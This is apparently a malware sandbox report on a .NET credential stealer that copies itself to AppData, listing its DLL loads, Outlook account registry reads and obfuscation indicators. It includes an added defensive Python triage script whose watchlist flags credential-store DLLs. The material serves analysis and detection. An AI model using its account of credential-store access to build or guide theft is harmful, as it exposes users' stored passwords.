                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: pstorec.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: pstorec.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dll
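The image-load list above is long, but the signal in it is narrow: the dropped copy in AppData\Roaming (DGlxtFUfY.exe) is the only process that pulls in vaultcli.dll, pstorec.dll and dpapi.dll (Credential Manager, legacy Protected Storage and CryptUnprotectData, the usual trio for browser and mail credential theft) next to the wininet/winhttp/dnsapi networking stack. The script below is an added triage example, not part of the Joe Sandbox report or its tooling: it parses lines in the report's "Source: <image>Section loaded: <dll>" shape (the fused form, the trailing "Jump to behavior" link label, and a cleaned "|"-separated form are all accepted), groups loads per process, and flags images that run from a user-writable directory and load credential-store or network DLLs. The watchlists and the path heuristic are assumptions for this example; the sample lines are constructed from the report's own entries, not a fresh capture.

```python
import re
from collections import defaultdict

# Constructed sample in the report's line shape (a subset of the entries above,
# reassembled by hand for this example, not pulled from the sandbox directly).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: wininet.dllJump to behavior",
    r"Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ncrypt.dllJump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior",
    r"Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll",
    r"Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wininet.dll",
    r"Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dnsapi.dll",
    r"Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: pstorec.dll",
    r"Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: vaultcli.dll",
    r"Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Section loaded: dpapi.dll",
    r"Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: pstorec.dll",
    r"Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll",
]

# Accepts "<image>Section loaded:", "<image> | Section loaded:" and an optional
# trailing "Jump to behavior" link label left over from the rendered page.
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+?\.dll)"
    r"(?:Jump to behavior)?\s*$",
    re.IGNORECASE,
)

# Assumed watchlists for this example; tune them to your own telemetry.
# ncrypt.dll is deliberately left out: every TLS client loads it via schannel.
CREDENTIAL_DLLS = {"vaultcli.dll", "pstorec.dll", "dpapi.dll"}
NETWORK_DLLS = {"wininet.dll", "winhttp.dll", "dnsapi.dll", "mswsock.dll"}
# Assumed heuristic: images living in a user profile or temp directory are untrusted.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads)\\|\\Temp\\", re.IGNORECASE
)


def parse(lines):
    """Yield (image_path, dll_name_lowercase) for every line that matches the report shape."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("image"), m.group("dll").lower()


def triage(lines):
    """Group image loads per process and annotate each process with the watchlist hits."""
    per_image = defaultdict(lambda: {"credential": set(), "network": set(), "all": set()})
    for image, dll in parse(lines):
        entry = per_image[image]
        entry["all"].add(dll)
        if dll in CREDENTIAL_DLLS:
            entry["credential"].add(dll)
        if dll in NETWORK_DLLS:
            entry["network"].add(dll)
    return {
        image: {
            "user_writable": bool(USER_WRITABLE_RE.search(image)),
            "credential": sorted(entry["credential"]),
            "network": sorted(entry["network"]),
            "loaded": len(entry["all"]),
        }
        for image, entry in per_image.items()
    }


def verdict(entry):
    """Coarse label: untrusted path plus credential DLLs beats untrusted path plus networking."""
    if not entry["user_writable"]:
        return ""
    if entry["credential"]:
        return "credential-access"
    if entry["network"]:
        return "network-capable"
    return ""


if __name__ == "__main__":
    for image, entry in triage(SAMPLE_LINES).items():
        tag = verdict(entry) or "-"
        print(f"{tag:18} {image}  cred={entry['credential']} net={entry['network']}")
```

Note what the path heuristic does and does not buy you: powershell.exe also loads dpapi.dll here, but from System32 it gets no tag, which is correct for this signal and wrong for this sample (the Sigma hits for the base64-encoded Add-MpPreference call cover that process). Treat the tag as a prior for analyst attention, not a verdict on its own, and pair it with the registry read of the Outlook "OMI Account Manager\Accounts" key shown below for the credential-theft story.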
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: LdSbZG1iH6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: LdSbZG1iH6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: LdSbZG1iH6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ZPyJ.pdb source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr
                      Source: Binary string: ZPyJ.pdbSHA256 source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr

Data Obfuscation

Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.cs | .Net Code: Aj1Y1KAo8j System.Reflection.Assembly.Load(byte[])
Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.cs | .Net Code: Aj1Y1KAo8j System.Reflection.Assembly.Load(byte[])
Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs | .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
Source: LdSbZG1iH6.exe | Static PE information: 0xD19BF8C7 [Mon Jun 9 01:58:31 2081 UTC]
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041CBE1
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 0_2_00F8EFB0 push esp; iretd 0_2_00F8EFB1
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_00457186 push ecx; ret 8_2_00457199
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041C7F3 push eax; retf 8_2_0041C7FD
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 10_2_06DD5E20 push edx; iretd 10_2_06DD5E21
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 14_2_10002806 push ecx; ret 14_2_10002819
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 14_2_10009FD8 push esi; ret 14_2_10009FD9
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 16_2_0044693D push ecx; ret 16_2_0044694D
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 16_2_00451D54 push eax; ret 16_2_00451D61
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 17_2_00444E71 push ecx; ret 17_2_00444E81
Source: LdSbZG1iH6.exe | Static PE information: section name: .text entropy: 7.8714607770183616
Source: DGlxtFUfY.exe.0.dr | Static PE information: section name: .text entropy: 7.8714607770183616
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, C3n7JsAJx6Dc9yBjh7.cs | High entropy of concatenated method names: 'p1olJ9EJZi', 'd2ilgDrBYq', 'eHSl18Ej12', 'qvclu8Pu6G', 'SH0lZiRmPP', 'X4Hln5stX6', 'ToilDkBTNs', 'zV2lWMNU3Z', 'UgClPtd4HR', 'woflbHChcU'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, L2165oTc18Ys7G5Drv.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ycj4pFlUjf', 'kVl4rC8RYv', 'OmT4zNBHJB', 'kJjxLayfC2', 'fH1xMsZ7P7', 'NwQx4M2pO9', 'SvhxxSLLrW', 'KLgw8dqXgKKBB7WWYaK'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, S0w2Yird1vtfqLM83v.cs | High entropy of concatenated method names: 'aqnUTY3rHE', 'pd6UOAFZji', 'RaCUwQYjP5', 'syBUlcXCYK', 'PO9UI0gR4d', 'GDPUkSxNSs', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, antjj6P923sx3geJla.cs | High entropy of concatenated method names: 'yipTuGPm4b', 'haYTnQShrV', 'rD0TWxjgc2', 'LpRTPuhJv0', 'G9cTRZdsbx', 'kTfTXKKEHy', 'UuMT883M5T', 'plOTS6TQEH', 'UNiTIJuw3i', 'ScuTUO77fN'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, U8d4cV4YvxH0uVSdZo.cs | High entropy of concatenated method names: 'EGg1ljkGC', 'xOYuCq2hs', 'Y8WncVS1d', 'ya6DjGhnC', 'decPORADb', 'Q2cbruQVo', 'juVEQnWFnwDJTEyeqR', 'ylNSukpZXHcPMQJ9lN', 'GRsSLxZmM', 'w0FUXTEDu'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, LvOBYdziOGRiOqldPC.cs | High entropy of concatenated method names: 'noWUnwPjE5', 'tJUUWwPKS5', 'lyyUPmWduP', 'IWKU3YEXvB', 'CwyUQinZUy', 'BX1UemkkLM', 'iBaUf4Puhq', 'TJgU0CSj3i', 'sIEUJl2MGV', 'eW8UgOlZoL'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, r0qZguMYmPcqKsKKY6Z.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lewjIgLXFG', 'eARjUNDbLi', 'S9fjqLRiPv', 'AwSjjC09MZ', 'lsjjHKcLIS', 'xbrjh7E5CU', 'V7Tj0gvnaR'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, SpGkNG2MTtcAExhwmk.cs | High entropy of concatenated method names: 'iHL8dC23t2', 'qyq8rZgheI', 'mGWSLyqFpA', 'QtBSMBD5ZV', 'fYr8CX6yee', 'xrb8GhxLAw', 'hr28yclrR8', 'mnR8vCMVnd', 'c7h8cNpP9a', 'XXo8oaWZiL'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, HP04oqMLHhf5oXodnML.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrDUCg3MRX', 'SUeUGNDPKq', 'IHHUye2ruC', 'iTyUv3O47u', 'GkvUc96R1d', 'WUyUo8aEvx', 'CAJUKRTO6M'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, GljOVrN5dspUP6abL2.cs | High entropy of concatenated method names: 'Dispose', 'EnfMphO5Ze', 'sGG4QfbaF4', 'cBqMvNu3dy', 'WpkMrEhRBo', 'ahXMzCyMNy', 'ProcessDialogKey', 'RX84L2XZOF', 'uOr4M9DJTl', 'yYm44c0w2Y'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, zF9cdEWZ6usHDRFDVF.cs | High entropy of concatenated method names: 'TwBNvxYGPD', 'Xc2NcQIgAR', 'nNANoDw8Zy', 'XLlNKXF592', 'P8cN5x7yHu', 'BPSN2IU2lx', 'c6ON6tH7RR', 'zDJNdAIhOK', 'FayNpFlxqP', 'jdYNrkbyQq'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, oHU4GjMMOmP83u0q7Jm.cs | High entropy of concatenated method names: 'bBjUrO20Lh', 'GTOUznXun8', 'VEWqLcI6lM', 'cNCqMTy7b5', 'wAOq41ObhC', 'YPEqxH567t', 'OCmqYSAZUs', 'zqmqayH2Cj', 'yGKqtOjq7Z', 'HC6qNiMYM9'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, p2XZOFpjOr9DJTlgYm.cs | High entropy of concatenated method names: 'vxgI3iFrn6', 'b4qIQdF7XC', 'r7gIVYIdhu', 'RSiIeg5q91', 'rbIIfmEdwq', 'wC0IEMxdN0', 'JitImT1L3f', 'hoVIBWBjke', 'YVvIAbCPdg', 'bhOI7QS6Ie'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, DAoa83mPFZpXtJWrO5.cs | High entropy of concatenated method names: 'BF2ltXEYAx', 'c5tlTP6vEo', 'GHclwf1HMu', 'V4Nwrv2Bqv', 'rjjwzHuQv4', 'bGOlL1LfMO', 'QmElM28MCy', 'MW5l4d6ja3', 'eu8lx76c9o', 'X8olY76jYm'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, cn19IQYSmV65AoC7Jp.cs | High entropy of concatenated method names: 'MB1MlF9cdE', 'B6uMksHDRF', 'W92Ms3sx3g', 'IJlMiaopR1', 'rwTMRA5SrF', 'hAiMXJVSkR', 'fKGSNmERkBAeWr0PwH', 'ubMtZxLgZ72ev7MF6m', 'b0CMMSonZV', 'X88MxQB2f4'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, dCsJjTy25rJ2rLEdGR.cs | High entropy of concatenated method names: 'P6wFWsY3O3', 'xYlFPkIhta', 'YksF37bSbh', 'yciFQ9S3b0', 'uccFeOImyk', 'YrTFfDvItY', 'xwnFm4WaD0', 'juMFBHXKsd', 'dHXF7DFhqe', 'mPPFCWDJu9'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, sj0FXjKA2xntr2LI2q.cs | High entropy of concatenated method names: 'B5A8s3maZU', 'AlD8i1C5LK', 'ToString', 'rLe8tx283t', 'K718Nbd5W3', 'XaP8TcQOjJ', 'KdH8OtOVxk', 'ERt8wDnZi7', 'Brg8lVitjC', 'f5f8k7McGq'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, CeGcCyQ4Uv4wWat4Nt.cs | High entropy of concatenated method names: 'NTRBmu7dQgpCnNlniII', 'PF3Jld79C12N2oKL9Da', 'dsrwS0Abth', 'k7mwIgYioR', 'sqFwUUg1s4', 'V75prb75EvKxoucCOhk', 'C5GVsV7Z1Op8EkUPLPB'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, rrFTAi3JVSkRSq1j8n.cs | High entropy of concatenated method names: 'KLbwa7KkSh', 'IfdwNOGomq', 'FpawOtJ8Zt', 'X9nwlmGsVx', 'pxfwkkXett', 'sSGO59e7SB', 'K6RO29G70d', 'gj8O6gOehE', 'T9YOdZr2tj', 'm3rOpgelwO'
Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.cs | High entropy of concatenated method names: 'kCOxaI4WO0', 'udqxt3wSme', 'D7qxNlci4K', 'bNIxTx5LO7', 'mH8xOkAQDo', 'VEgxw3mrCs', 'a6MxlqBAQV', 'Bgpxk1f1HZ', 'gNTx9CpewZ', 'RFExsec5cY'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, Lhu2Xr6HQPnfhO5Ze6.csHigh entropy of concatenated method names: 'odSIRG530M', 'BUeI8abEiT', 'IEuII6qyo2', 'x1qIqHcrtj', 'JlTIHwC1nv', 'zm7I031HT2', 'Dispose', 'PbtStwZMeJ', 'GIXSNkcwmA', 'IOpSTxsiU9'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, BtySsYvTRfLknWa3ML.csHigh entropy of concatenated method names: 'RPeR7yxRwf', 'eGGRG8u7dE', 't3wRvU8MTv', 'uZyRceRHAg', 'zAZRQWvdGU', 'G7GRV8iaec', 'Qw4Re6I2fp', 'KWkRfufABj', 'PPfREGvx8m', 'zrYRmBLJ8M'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, oBSRqFMa3qnCnCr0vZa.csHigh entropy of concatenated method names: 'mwdGDghhPQqDI', 'FhVWVgXH0OkevnHNKA6', 'oF01rlXKLMHBQP8aybv', 'EVxua2XMdkPNqIEhcRl', 'RjopoHXg9btMdUC5ldF', 'aK2VukX1xXjsb4oZ4Lg'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, C3n7JsAJx6Dc9yBjh7.csHigh entropy of concatenated method names: 'p1olJ9EJZi', 'd2ilgDrBYq', 'eHSl18Ej12', 'qvclu8Pu6G', 'SH0lZiRmPP', 'X4Hln5stX6', 'ToilDkBTNs', 'zV2lWMNU3Z', 'UgClPtd4HR', 'woflbHChcU'
